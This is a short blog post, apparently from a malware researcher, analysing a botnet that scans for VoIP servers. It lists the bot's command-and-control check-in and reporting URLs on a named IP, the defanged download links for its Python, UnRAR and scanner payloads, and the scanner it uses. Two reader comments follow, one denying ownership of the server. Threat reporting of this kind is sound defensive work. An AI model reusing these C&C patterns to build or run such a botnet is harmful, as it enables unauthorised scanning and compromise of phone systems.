casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)

I found this recently and though it was interesting enough to post.

It’s a http controlled botnet used to scan for voip servers.

Malware actions
Tells the C&C server it has installed
208.98.52.163/90/getip.php?action=live
Requests an ip segement to scan
208.98.52.163/90/getip.php?action=get
Downloads and installs python (Needed for the scanner)
hxxp://208.98.52.163/90/files/python-2.7.2.msi
IP range to be scanned is confirmed
208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
Unrar utility is downloaded
hxxp://208.98.52.163/90/files/UnRAR.exe
Scanner is downloaded
hxxp://208.98.52.163/90/files/pack.rar
The malware extracts the scanning scripts and starts scanning the ip range.

Discovered voip servers are then reported back to the C&C server.
208.98.52.163/90/insert.php?action=insert&computer=%20USER-PC&router=127.0.0.1:5060&type=FPBX-2.8.1(1.4.44)

The scanner is an open source python script https://code.google.com/p/sipvicious/

The malware is unencrypted and some info can be found from strings in it.
H:Program Files (x86)Microsoft Visual StudioVB98Sip Scannersip_scanner.vbp

Sample here

Hosting infos: http://whois.domaintools.com/208.98.52.163 

Categories: Uncategorized

2 Comments

Xander Lawson - December 6, 2012 at 3:44 am

This is why we're very particular about business voip phone security at the office. You can never be too sure these days, especially when it comes to vital or sensitive information.

Anonymous - December 1, 2013 at 12:19 am

hi i am the owner about this domain, and we are not running this malware on our server, not that we know off, just to be sure we have asked our technicians to install a firewall to prevent us from been DDOS because we noticed that competition has done this to us. Please remove your bad comment, also our server isnt hosted on the location you mentioned.

Comments are closed